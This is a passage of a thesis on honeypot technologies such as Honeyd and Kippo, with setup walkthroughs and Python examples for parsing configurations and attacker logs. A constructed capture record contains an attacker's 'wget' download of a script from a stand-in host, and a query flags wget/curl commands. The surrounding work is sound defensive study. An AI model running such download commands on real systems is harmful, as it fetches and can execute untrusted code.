Honeyd has the unique ability to emulate operating systems not only at the application level but also at the IP stack level. With Honeyd, when an attacker tries to communicate with an emulated service such as a Web server, the emulated service behaves differently according to the selected emulated operating system and scripts. With Honeyd you can see how a Web server becomes a Microsoft IIS Web server or an Apache Web server depending on whether the emulated operating system is Microsoft based or Unix based. Honeyd has the capability to emulate a Unix based system so that its IP stack acts as a Unix IP stack, and if it emulates a Cisco router then the IP stack acts as a Cisco router IP stack too.
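The template logic of sections 5.1.2 and 5.1.3 (personality, default action for unbound ports, service scripts on bound ports, and the RST-but-log behaviour for TCP port 123) as an added example; this is a toy model written for this thesis text, not Honeyd's own code. The configuration follows the honeyd.conf directives as I know them (create, set personality, set default tcp action, add tcp port, bind); the template names, addresses, script paths and personality strings are constructed, and in a real deployment a personality must match an entry in the nmap fingerprint file Honeyd is started with.

```python
"""Toy model of the decision Honeyd makes for an incoming TCP connection
(added example; not Honeyd's own code)."""
import shlex
from dataclasses import dataclass, field

HONEYD_CONF = """
# Constructed template: Windows XP SP1 at the IP stack level, RST on ports
# without an emulator, service scripts on TCP 80 and 23.
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
set windows default udp action reset
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 23 "perl scripts/router-telnet.pl"
bind 192.168.1.200 windows

# Constructed router template: unbound ports are dropped (look filtered).
create router
set router personality "Cisco IOS 12.1"
set router default tcp action block
add router tcp port 22 "sh scripts/ssh.sh"
bind 192.168.1.201 router
"""


@dataclass
class Template:
    name: str
    personality: str = ""
    default_tcp: str = "block"   # value this model uses when the config sets none (assumption)
    default_udp: str = "block"
    ports: dict = field(default_factory=dict)   # TCP port -> emulator command


def parse_conf(text):
    """Parse the honeyd.conf subset used above; returns (templates, bindings)."""
    templates, bindings = {}, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tok = shlex.split(line)          # keeps quoted personality/command strings whole
        if tok[0] == "create":
            templates[tok[1]] = Template(tok[1])
        elif tok[0] == "set" and tok[2] == "personality":
            templates[tok[1]].personality = tok[3]
        elif tok[0] == "set" and tok[2:5] == ["default", "tcp", "action"]:
            templates[tok[1]].default_tcp = tok[5]
        elif tok[0] == "set" and tok[2:5] == ["default", "udp", "action"]:
            templates[tok[1]].default_udp = tok[5]
        elif tok[0] == "add" and tok[2:4] == ["tcp", "port"]:
            templates[tok[1]].ports[int(tok[4])] = tok[5]
        elif tok[0] == "bind":
            bindings[tok[1]] = templates[tok[2]]
        else:
            raise ValueError(f"unsupported directive: {line}")
    return templates, bindings


def handle_syn(bindings, dst_ip, dst_port):
    """Decide how Honeyd answers a SYN to dst_ip:dst_port.

    Returns (decision, detail):
      ("unmonitored", None)  address is not bound to any template
      ("emulate", command)   a service script takes over the connection
      ("reset", personality) RST goes back: the port looks closed, but the
                             attempt is still logged (the TCP/123 case)
      ("block", personality) nothing goes back: the port looks filtered
    """
    tmpl = bindings.get(dst_ip)
    if tmpl is None:
        return ("unmonitored", None)
    if dst_port in tmpl.ports:
        return ("emulate", tmpl.ports[dst_port])
    return (tmpl.default_tcp, tmpl.personality)


if __name__ == "__main__":
    _, bound = parse_conf(HONEYD_CONF)
    for ip, port in [("192.168.1.200", 80), ("192.168.1.200", 123),
                     ("192.168.1.201", 22), ("192.168.1.201", 123),
                     ("192.168.1.5", 80)]:
        print(f"{ip}:{port} -> {handle_syn(bound, ip, port)}")
```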

5.2 Kippo

Kippo is a medium interaction honeypot that emulates an SSH server. It provides an interactive shell to the intruder while monitoring and capturing all the activities. A little information about Secure Shell (SSH): it is a network protocol which provides encrypted communication between two devices. An SSH server allows users to gain access to remote devices through a shell or interactive command line interface in a secure manner. Port 22 is used by the SSH protocol by default. Clients usually access an SSH server by entering a valid username and password through an SSH client tool. From that perspective SSH servers are very vulnerable to password attacks. [2]

Password attacks, especially dictionary or brute force attacks, are very common and quite easy to launch against SSH servers, even by unqualified attackers. These types of attacks are based on the fact that many users choose their credentials from a small domain. Brute force attacks try all the possible username and password combinations in an automated way until the correct password is found. This property can be very useful for SSH server honeypot implementations: in order to have as many successful logins as possible in our SSH honeypot, it is preferable to choose credentials that automated dictionary attack tools rely on.


5.2.1 Features of Kippo

Python is the language that Kippo is implemented in. As discussed before, Kippo basically emulates an SSH server on port 22 and logs or captures all login attempts to that port. Whenever a login is successful, Kippo monitors all the attacker's input commands and replies to these commands in order to convince the attacker that they are interacting with a real system. More specifically, the features of Kippo include:

• Kippo provides a fake file system in which the attackers can add or remove files with the appropriate commands.

• Kippo saves files that have been downloaded or stolen by the attackers with the wget command in a specific secured folder.

• Kippo provides fake output for some specific commands, for instance useradd.

• Kippo tries to fool the attackers with its reactions to specific commands; for instance the exit command does not work, which means that the attacker thinks they have disconnected but can still be monitored by Kippo.

• All sessions are recorded and can be easily replayed with the original timestamps.

• All records are kept in an SQL database.

5.2.2 How Kippo Works

As mentioned before, Kippo records all the useful information in a log file and also in an SQL database. The main tables of the database include:

• Authentication Table: Contains information about the login attempts, the timestamps of the attempts and the usernames and passwords that have been used.

• Client Table: Contains information about the SSH client version that has been used.

• Input Table: Contains information about the input commands that have been entered, together with the session id, the timestamps and whether the command was successful or not.

• Session Table: Contains information about the id of the connection, the duration and timestamps of the connection and the IP address of the attacker.


• Sensor Table: Provides information about the SSH server and the IP address of the host.

• TTYlog Table: Finally, this table contains the information needed to replay sessions with the corresponding timestamps.
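As an added example of what an analyst can get out of the tables listed above, the following Python code builds a simplified version of the authentication, client, session and input tables in SQLite and answers three questions: which credentials the attackers try most, which sessions downloaded files (the wget case from section 5.2.1), and what a successful intruder typed. This is not Kippo's own schema or code: the column names are assumptions, and every record is constructed.

```python
"""Analysis queries over a Kippo-style capture database (added example;
simplified schema and constructed rows, not Kippo's own)."""
import sqlite3

SCHEMA = """
CREATE TABLE clients  (id INTEGER PRIMARY KEY, version TEXT);
CREATE TABLE sessions (id TEXT PRIMARY KEY, starttime TEXT, endtime TEXT,
                       ip TEXT, client INTEGER REFERENCES clients(id));
CREATE TABLE auth     (id INTEGER PRIMARY KEY, session TEXT, success INTEGER,
                       username TEXT, password TEXT, timestamp TEXT);
CREATE TABLE input    (id INTEGER PRIMARY KEY, session TEXT, timestamp TEXT,
                       success INTEGER, input TEXT);
"""

# Constructed records (documentation IP ranges): one source brute-forces,
# logs in on its second session and fetches a file; another fails once.
ROWS = {
    "clients": [(1, "SSH-2.0-libssh-0.1"), (2, "SSH-2.0-OpenSSH_6.0")],
    "sessions": [
        ("s1", "2014-12-08 10:00:00", "2014-12-08 10:00:05", "198.51.100.7", 1),
        ("s2", "2014-12-08 10:00:06", "2014-12-08 10:03:40", "198.51.100.7", 1),
        ("s3", "2014-12-08 11:15:00", "2014-12-08 11:15:01", "203.0.113.9", 2),
    ],
    "auth": [
        (1, "s1", 0, "root", "123456", "2014-12-08 10:00:01"),
        (2, "s1", 0, "root", "password", "2014-12-08 10:00:03"),
        (3, "s2", 1, "root", "123456", "2014-12-08 10:00:07"),
        (4, "s3", 0, "admin", "admin", "2014-12-08 11:15:00"),
    ],
    "input": [
        (1, "s2", "2014-12-08 10:00:20", 1, "uname -a"),
        (2, "s2", "2014-12-08 10:01:02", 1, "wget http://198.51.100.7/x.sh"),
        # Kippo's fake exit: the attacker keeps typing in a session they
        # believe is closed, so commands after "exit" are still recorded.
        (3, "s2", "2014-12-08 10:01:30", 1, "exit"),
        (4, "s2", "2014-12-08 10:02:00", 1, "ls /root"),
    ],
}


def open_db():
    """Create the in-memory database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    conn.commit()
    return conn


def top_credentials(conn, limit=3):
    """Most-tried username/password pairs: the dictionary the attackers bring."""
    return conn.execute(
        """SELECT username, password, COUNT(*) AS n FROM auth
           GROUP BY username, password
           ORDER BY n DESC, username, password LIMIT ?""", (limit,)).fetchall()


def downloads_by_source(conn):
    """Download commands per attacker IP (the files Kippo stores for analysis)."""
    return conn.execute(
        """SELECT s.ip, i.input FROM input i JOIN sessions s ON s.id = i.session
           WHERE i.input LIKE 'wget %' OR i.input LIKE 'curl %'
           ORDER BY i.timestamp""").fetchall()


def successful_sessions(conn):
    """For each session with a successful login: source, SSH client,
    credential used and every command typed, in timestamp order."""
    out = []
    for sid, ip, ver, user, pw in conn.execute(
            """SELECT s.id, s.ip, c.version, a.username, a.password
               FROM auth a JOIN sessions s ON s.id = a.session
               JOIN clients c ON c.id = s.client
               WHERE a.success = 1 ORDER BY s.starttime"""):
        cmds = [r[0] for r in conn.execute(
            "SELECT input FROM input WHERE session = ? ORDER BY timestamp", (sid,))]
        out.append({"session": sid, "ip": ip, "client": ver,
                    "credential": f"{user}:{pw}", "commands": cmds})
    return out


if __name__ == "__main__":
    db = open_db()
    print(top_credentials(db))
    print(downloads_by_source(db))
    print(successful_sessions(db))
```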

5.3 Conpot

Conpot is a low interaction honeypot technology. It is open source, all of the code is available, and it is easy to deploy, modify and extend. It can emulate complex infrastructures. Finally, it is a server side Industrial Control Systems honeypot technology, providing a range of common industrial control protocols as the basics to build your own system. Conpot is developed under the umbrella of the Honeynet Project and on the shoulders of a couple of very big giants.

5.4 Dionaea

Dionaea is a low interaction honeypot system technology. Dionaea's intention or goal is to trap malware exploiting vulnerabilities exposed by services offered to a network; the ultimate goal is gaining a copy of the malware. Dionaea can provide services via TCP/UDP and works with IPv4 and IPv6. Dionaea is developed in Python, a powerful scripting language.

Dionaea has modules for emulating services, for instance SMB, HTTP, FTP, TFTP, MSSQL, MySQL and SIP (VoIP). Dionaea also has other tools that, while interacting with the attackers, try to obtain a copy of the malware.

5.5 HoneyWall

At first it is nice to mention that the purpose of the Honeywall CDROM technology is to make honeynet deployments easy, simple and effective. The Honeywall CDROM accomplishes this by automating the process of deploying a honeynet gateway, also known as a Honeywall. The Honeywall CDROM also provides tools to easily configure, maintain and analyse the solution after it has been deployed. The Honeywall is often the most complex element of any successful honeynet deployment.

The goal of the Honeywall CDROM is to capture, control and analyse all inbound and outbound honeynet activity. Building a Honeywall is a difficult and manually intensive process, requiring the combination of various technologies. Fortunately the Honeynet Project has attempted to combine all of these elements into a single, bootable installation CDROM. After installation, minor configuration is required in order for the system to be fully functional.


5.6 HoneyBot

HoneyBOT is a medium interaction honeypot for Windows. It is an easy to use solution, ideal for network security research. The capturing and logging capability of a honeypot is higher than that of any other network security technology: it captures raw packet level data, even including keystrokes and mistakes made by the attackers. The gathered information is highly valuable as it contains only malicious traffic with little to no false positives.

HoneyBOT works by opening a range of listening ports on the implemented system which are designed to look like vulnerable services. Once the attackers connect to these services they are fooled into thinking that they are attacking a real system or server. HoneyBOT safely captures all communications with the attackers and logs the results for future analysis. The attacker may attempt an exploit or upload a rootkit, malware, worm or trojan to the server; in the HoneyBOT environment these files can be safely stored on the implemented system for malware collection and analysis purposes.

5.7 BackOfficer Friendly

Another cool honeypot system technology which will be discussed is BackOfficer Friendly, also called BOF. It is one of the simplest Windows or Unix based honeypot systems, and its functionality is remarkably easy to configure and understand. Because of this simplicity some security professionals do not accept it as a true honeypot system. However, this simplicity makes BOF an excellent technology that everyone can use. It is selected as an excellent introduction to the concept of honeypot systems for inexperienced security administrators.

BackOfficer Friendly is a low interaction honeypot system developed in 1998 by Marcus Ranum that can run on Microsoft and Unix systems, although it was made primarily for Windows based systems. BOF runs on all Windows based operating systems from Windows 95 to Windows 8.1, and this compatibility makes it an excellent solution for desktop systems including home users. BOF can emulate up to seven services; unlike Honeyd there is no customization option and the functionality is limited, since it was designed as a response to a specific threat.

At first BOF was designed to detect some specific Trojans that were distributed across the networks of many organizations. Whenever attackers scan the network or a specific system, BOF generates an alarm. Additional services were then added to increase its detection capabilities. When attackers run an automated scan against our network, BackOfficer Friendly starts producing a string of alerts, making obvious what has occurred on the network. There is one important issue: when you want to install it on Unix systems you have to download the source code, then compile and install it yourself.


5.8 The Value of BOF

As you understand, BOF is a low interaction honeypot system, and depending on the classification it is a production type of honeypot system. About the value of BOF, it is obvious that it increases the security of the organization's network by detecting and alerting on attacks. There are seven preconfigured services on which BOF can detect attacks; when a communication or connection is made to any of these seven services, the interaction is captured and logged and an alert is generated too. This limitation in emulating services means that BOF only covers the basic functionality of the services. For example, when it emulates a Web server it only captures the attempts to get a Web page, but it does not emulate a specific Web server like Apache or IIS. Additional services cannot be added or customized according to our needs. BOF is limited to detecting attacks just on the seven ports that it monitors. Unfortunately, if an attacker attacks another port, BOF does not become aware of the attack or the attacker's activities, and this kind of limitation is common to most low interaction honeypot systems. [? ]

It is difficult to prevent attacks with BOF because of its limited interaction with the attackers. Also, even when BOF detects an attack it gives us little information about what the attacker is doing, what kind of technology the attacker is using or what the target of the attack is; in this case, once BOF alerts you to an attacker's activities, other technologies are required to respond to the attacks. The information captured once an attack is detected is the IP address of the attacker, the targeted port and the time of the attack, and some of the services can also determine the type of attack. These were the values of BackOfficer Friendly, a small honeypot technology with limited services.[?]

To configure the BOF honeypot system, double click on its icon and you will get to the BOF console. All the configuration, maintenance, logs and alerts happen within a single graphical user interface, which makes BOF a simple solution for everyone to use. Next you configure what you want: whether BOF should start automatically, what services to listen on and what services BOF should emulate; everything is easy to configure. The first important option is running BOF at start-up, and it is highly recommended that you configure it, because if BOF is not running it cannot detect any attacks, and if you have to start it manually on every reboot you may sometimes forget. In BOF you have just seven services to select from for listening, and there is no option to create your own services or port listeners. Here are the seven services of BOF.[? ]

• FTP (File Transfer Protocol): as you know, a protocol used to transfer files, listening on TCP port 21. This is an important common service that most attackers will target, and you will see a great number of activities and interactions on this port.

• Telnet: a commonly used protocol for administering systems remotely, listening on TCP port 23.

• SMTP (Simple Mail Transfer Protocol): the protocol used for sending and receiving e-mail, listening on TCP port 25.

• HTTP (Hyper-Text Transfer Protocol): a common protocol used for Web connections or the World Wide Web, listening on TCP port 80. There is no option to listen on TCP port 443, known as the Secure Socket Layer (SSL) port for encrypted Web connections.

• POP3 (Post Office Protocol): a protocol used by clients to retrieve their e-mail, listening on TCP port 110.

• IMAP (Internet Message Access Protocol): this protocol is also used by clients to retrieve their e-mail, listening on TCP port 143.

Finally, there are many other technologies related to honeypot and honeynet systems, both open source and closed source. Everyone can search for them on the Internet and implement them according to their needs. Here the open source technologies are preferred because they are free and customizable, and everyone can develop and customize them according to their organization's needs.


Chapter 6
DESIGNING COUNTERMEASURES FOR TOMORROWS THREATS

This chapter mainly focuses on the implementation part of the thesis, implementing some of the most useful honeypot and honeynet technologies that exist at the time of writing for Designing Countermeasures For Tomorrows Threats. Many honeypot and honeynet technologies, both open source and closed source, were implemented during the research for this thesis, but here the focus is on two important honeypot system technologies that were successfully implemented.

The first honeypot system technology is Honeyd (Honey Daemon), an open source low interaction honeypot system technology which was discussed in detail in the previous chapters.

The second is the Kippo honeypot system technology, which is also open source and is a medium interaction honeypot system technology. This technology was also discussed in detail in the previous chapters.

Here two operating systems are used for implementing these technologies: Ubuntu for implementing the technologies and Kali Linux for attacking the systems, as shown in figure 6.1.


Figure 6.1: The Used Operating Systems

6.1 Implementation of Honeyd (Honey Daemon) Technology

Honeyd technology was discussed in detail in the previous chapters; this chapter just focuses on the implementation of Honeyd step by step with screenshots.

Figure 6.2 shows the installation of the Honeyd honeypot system technology. It is done with the command sudo apt-get install honeyd, like the installation of any other application.

Figure 6.2: The Installation of Honeyd Technology

After installing Honeyd, we look at the files and config files of Honeyd for configuration, as shown in figure 6.3.


Figure 6.3: The List of Honeypot Folder

As discussed before, Honeyd can emulate many different devices such as switches, routers and operating systems from various companies, open source and closed source. Here, for instance, a Microsoft Windows XP Professional SP1 is emulated, as shown in figure 6.4.

Figure 6.4: Making of a Template For Emulation

Figure 6.5 shows another template that emulates a Cisco router with vulnerabilities for trapping the attackers, interacting with them and capturing their interaction with the router. Here you see the SSH and Telnet ports linked to some scripts. When the attackers try to connect to these ports, the connection is redirected to the scripts, which start interacting with the attackers and logging their actions.

Figure 6.5: Making of a Router Template For Emulation

Here are the scripts that Honeyd uses for emulating fake services for the attackers, as shown in figure 6.6. There are lots of services here, and you can customize them or build new services to do what you want. Usually you build the services using scripting languages such as shell and Perl.

Figure 6.6: The Scripts For Service Emulation of Honeyd Technology

To start the Honeyd honeypot system there is a command, shown in figure 6.7; by entering that command Honeyd starts running. This command takes lots of parameters like the configuration file, fingerprint file, log file, interface card and so on.

Figure 6.7: Running of the Honeyd Technology

Figure 6.8 shows the attacker side when pinging a fake system.


Figure 6.8: Pinging the Emulated Systems

Figure 6.9 shows the Honeyd system capturing the interaction with the attackers.

Figure 6.9: Capturing the Attackers Interaction

Figure 6.10 shows the attacker running nmap against the emulated system to find open or vulnerable ports.


Figure 6.10: The nmap of Emulated System for Ports Vulnerabilities

Figure 6.11 shows the process of running a Python script for entering the gathered information into a MySQL database.

Figure 6.11: Running of the Honeyd2MySQL For Entering Captured Data into a MySQL Database

This is the process of entering the gathered information into the MySQL database, as shown in figure 6.12.


Figure 6.12: The Process of Entering Gathered Information to the MySQL Database
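What a Honeyd2MySQL-style script has to do, as an added example that is not the thesis's or the Honeyd2MySQL project's code: parse Honeyd packet-log lines and load them into a database table that the analysis queries can run against. The log lines are constructed in the layout of Honeyd's packet log; SQLite (standard library) stands in for MySQL so the example runs offline, and the same INSERT works against MySQL through a DB-API driver.

```python
import re
import sqlite3

# Constructed sample lines in the layout of Honeyd's packet log (honeyd -l):
# timestamp proto(num) S=start|E=end|-=single packet src sport dst dport [info]
HONEYD_LOG = """\
2014-11-08-10:23:45.1234 tcp(6) S 203.0.113.7 43210 10.0.0.1 22 [Linux 2.6]
2014-11-08-10:23:52.0020 tcp(6) E 203.0.113.7 43210 10.0.0.1 22: 318 1204
2014-11-08-10:24:01.5000 udp(17) - 198.51.100.9 137 10.0.0.1 137: 78
2014-11-08-10:24:30.0001 tcp(6) S 203.0.113.7 43211 10.0.0.1 23 [Windows XP]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>[a-z]+)\(\d+\) (?P<event>[SE-]) "
    r"(?P<src>\S+) (?P<sport>\d+) (?P<dst>\S+) (?P<dport>\d+):? ?(?P<info>.*)$")

SCHEMA = ("CREATE TABLE IF NOT EXISTS connections (ts TEXT, proto TEXT, event TEXT, "
          "src TEXT, sport INTEGER, dst TEXT, dport INTEGER, info TEXT)")

def open_db():
    """In-memory SQLite database standing in for the MySQL database on the page."""
    return sqlite3.connect(":memory:")

def parse_line(line):
    """Return one log record as a dict, or None if the line is not a Honeyd log line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec

def load_log(log_text, conn):
    """Insert every parsable line into the connections table; return rows inserted."""
    conn.execute(SCHEMA)
    rows = [r for r in map(parse_line, log_text.splitlines()) if r]
    conn.executemany("INSERT INTO connections VALUES "
                     "(:ts, :proto, :event, :src, :sport, :dst, :dport, :info)", rows)
    conn.commit()
    return len(rows)

def top_sources(conn, limit=5):
    """Source addresses ranked by number of TCP connections they opened (event S)."""
    cur = conn.execute("SELECT src, COUNT(*) FROM connections WHERE event = 'S' "
                       "GROUP BY src ORDER BY COUNT(*) DESC, src LIMIT ?", (limit,))
    return cur.fetchall()

def targeted_ports(conn):
    """Distinct destination ports that attackers opened connections to."""
    cur = conn.execute("SELECT DISTINCT dport FROM connections WHERE event = 'S' ORDER BY dport")
    return [row[0] for row in cur.fetchall()]
```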

Figure 6.13 shows the Honeyd-VIZ web interface files.

Figure 6.13: The list of files of Honeyd-VIZ Web Interface

Figure 6.14 shows the web interface configuration file.


Figure 6.14: The Web Interface Configuration File

After opening the web interface, it must first generate the Honeyd graphs from its database, into which the gathered information was entered before, as shown in figure 6.15.

Figure 6.15: Generating the Honeyd-VIZ Graph

After generating the graphs there are many other useful capabilities, such as the Honeyd geographical information, which shows the attackers' locations all over the world, as shown in figure 6.16.


Figure 6.16: The Geographical Location of the Attackers

Figure 6.17 shows that there are many kinds of graphs for various issues, and all the graphs are in the graph gallery.

Figure 6.17: The Various Graphs For Different Issues


6.2 Implementation of Kippo Technology

The second technology implemented in this thesis is the Kippo honeypot system technology; it is an open source medium level interaction honeypot system technology. After installing it on a system, it can be started by a command as shown in figure 6.18.

Figure 6.18: The List of Files and Running of Kippo Technology

Kippo has a valid user database file in which you can put some usernames and passwords. As shown in figure 6.19, these entered usernames and passwords are valid for the Kippo honeypot technology, and anyone can log in with them and start interacting with the Kippo honeypot system technology.


Figure 6.19: The Valid Users Database

This is the first SSH connection that the Kippo honeypot system technology successfully responded to; it asks to confirm the connection and to add this system to the list of known hosts, as shown in figure 6.20.

Figure 6.20: Starting to Attack the Kippo Technology

As shown in figure 6.21, you can monitor the Kippo log file live, in real time, to see the connections and interactions with the Kippo honeypot system technology.


Figure 6.21: Live Monitoring Log File of Kippo Technology

Figure 6.22 also shows the live monitoring of the Kippo log file.

Figure 6.22: Live Monitoring Log file of Kippo Technology

Figure 6.23 shows an attempt to enter the system with an invalid username and password, that is, a username and password that were not entered into the valid username and password file shown before.


Figure 6.23: Attempting to Connect With Wrong Passwords
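The two things the Kippo figures show, the valid user database of figure 6.19 and the failed and successful login attempts in the live log of figures 6.21 to 6.23, turned into a small analysis script. This is an added example, not the thesis's or Kippo's own code; the userdb and log lines are constructed in the layout of Kippo's data/userdb.txt and kippo.log, and the addresses and credentials are made up.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of Kippo's data/userdb.txt (username:uid:password).
USERDB = """\
root:0:123456
admin:1000:admin
"""
# Constructed sample lines in the layout Kippo writes to kippo.log.
KIPPO_LOG = """\
2014-11-08 10:30:01+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.7:51022 (10.0.0.2:2222) [session: 1]
2014-11-08 10:30:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/toor] failed
2014-11-08 10:30:04+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password] failed
2014-11-08 10:30:05+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/123456] succeeded
2014-11-08 10:30:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: uname -a
2014-11-08 10:31:40+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.9] login attempt [admin/1234] failed
"""

AUTH_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] login attempt "
                     r"\[(?P<user>[^/]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)")
CMD_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")

def load_userdb(text):
    """Parse username:uid:password lines into {username: password}."""
    users = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            user, _uid, pw = line.split(":", 2)
            users[user] = pw
    return users

def would_succeed(users, user, pw):
    """True if the honeypot would accept this pair, i.e. it is in the user database."""
    return users.get(user) == pw

def summarize(log_text):
    """Per source IP: failed/succeeded login counts and the commands typed after login."""
    stats = defaultdict(lambda: {"failed": 0, "succeeded": 0, "commands": []})
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if m:
            stats[m["ip"]][m["result"]] += 1
            continue
        m = CMD_RE.search(line)
        if m:
            stats[m["ip"]]["commands"].append(m["cmd"].strip())
    return dict(stats)

def brute_force_sources(stats, min_failed=2):
    """Source IPs with at least min_failed failed logins, sorted."""
    return sorted(ip for ip, s in stats.items() if s["failed"] >= min_failed)
```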

Figure 6.24 shows entering the system with a correct username and password and starting to interact with the system just like a real system.

Figure 6.24: Attempting to Connect With Correct Passwords

Figure 6.25 shows the process of adding new users to the system.


Figure 6.25: Adding New Users While Interacting With the Emulated System

Figure 6.26 shows more interactions: making files and folders and manipulating them.

Figure 6.26: Doing More Interactions Making Files and Folders

Figure 6.27 shows viewing the network interface cards with their details.


Figure 6.27: More Interaction, Monitoring Network Interfaces

Figure 6.28 shows the live monitoring of the Kippo honeypot system technology log file for the attacks and interactions.

Figure 6.28: Monitoring Kippo Technology Log File Real Time


Figure 6.29 shows running a script for entering the gathered information into a MySQL database for analysis.

Figure 6.29: Running the Kippo2MySQL Script for Entering Gathered Information to the Database

Figure 6.30 shows the process of entering the gathered information into the database.

Figure 6.30: Entering Gathered Information to the Database


Figure 6.31 shows the list of web interface and configuration files.

Figure 6.31: List of Web Interface Files and Configuration File

Figure 6.32 shows the web interface configuration file.

Figure 6.32: Web Interface Configuration File

As shown in figure 6.33, when opening the web interface it is first necessary to generate the graphs from the gathered information.


Figure 6.33: Generating Graphs From Gathered Information

After generating the graphs you can see many beautiful graphs built from the various gathered information, as shown in figure 6.34.

Figure 6.34: Various Graphs for Different Issues

Figure 6.35 shows the commands that the attackers used inside the target system.


Figure 6.35: The Commands that the Attackers Used

Figure 6.36 shows the list of attackers' interactions from entering until leaving the system, which can be replayed like a video player.

Figure 6.36: The Kippo Play Log

Figure 6.37 shows playing back the attackers' interaction to watch what the attackers did inside the target system.


Figure 6.37: The Kippo Play Log

Like the Honeyd honeypot system technology, the Kippo technology also has the capability to show the attackers' locations all over the world, as shown in figure 6.38.

Figure 6.38: The Geographical Location of the Attackers

Finally, it has the graph gallery covering many different graphs for various issues; all these graphs are built from the information gathered from the attackers, as shown in figure 6.39.


Figure 6.39: The Graph Gallery of Kippo Technology


Conclusion

Network security problems exist everywhere, especially in the military, organizations, universities, banks, the private sector, ISPs, airports, transport and so on. Once attackers attack a system it is important to know who is attacking us, how they attack and what the attackers are trying to achieve by attacking the target networks. By learning these important issues you will know how to defend against the attackers.

This thesis researches and implements different solutions for solving these problems. In particular, honeypot and honeynet system concepts are used in this thesis for our main title, which is Designing Countermeasures For Tomorrows Threats. The various honeypot and honeynet system technologies that exist at the time of writing this thesis are discussed in the previous chapters.

Finally, after implementing various types of honeypot and honeynet system technologies, both open source and closed source, this thesis presents the best solution for securing the internal networks of Afghanistan, especially for the government and ministries, for instance the Ministry of Interior, and other important organizations.


Further Research

This thesis covers two types of honeypot and honeynet systems: low level interaction honeypot systems and medium level interaction honeypot and honeynet systems.

For future work on this thesis it would be worthwhile to research two other important issues in honeypot and honeynet systems.

First, research on high level interaction honeypot and honeynet systems, and their design and implementation.

Second, research specifically on honeynet systems. It is obvious that honeynet systems usually use real systems for having high level interaction with the attackers. This will also be important research related to the honeypot and honeynet system concepts. [5] [12]


Bibliography

[1] Developments of the Honeyd Virtual Honeypot. http://www.honeyd.org/. Accessed: 2014-10-05.

[2] How To Install Kippo, an SSH Honeypot, on an Ubuntu Cloud Server. https://github.com/desaster/kippo. Accessed: 2014-11-08.

[3] The Honeynet Project. http://www.honeynet.org/. Accessed: 2014-09-08.

[4] Andy Oram and John Viega. Beautiful Security: Leading Security Experts Explain How They Think. April 2009.

[5] Michael D. Bauer. Linux Server Security. January 2005.

[6] John E. Canavan. Fundamentals of Network Security. October 2001.

[7] Daniel J. Barrett, Richard Silverman and Robert G. Byrnes. Linux Security Cookbook. June 2003.

[8] Eric Cole, Ronald Krutz and James W. Conley. Network Security Bible. November 2005.

[9] James Michael Stewart, Ed Tittel and Mike Chapple. Certified Information Systems Security Professional. December 2005.

[10] Narinder Kaur. Honeypot. May 2012.

[11] Chris McNab. Network Security Assessment. August 2008.

[12] Nitesh Dhanjani, Billy Rios and Brett Hardin. Hacking: The Next Generation. September 2009.

[13] Ram Kumar Singh and T. Ramanujam. Intrusion detection system using advanced honeypots. November 2009.

[14] Reto Baumann and Christian Plattner. Honeypots. February 2002.

[15] Lance Spitzner. Honeypots: Tracking Hackers. September 2002.

[16] Mark D. Spivey. Linux Server Security. June 2007.

[17] Mark Stamp. Information Security. September 2011.

[18] Nong Ye. Secure Computer and Network Systems. July 2008.

[19] Yogendra Kumar Jain and Surabhi Singh. Honeypot based secure network system. February 2011.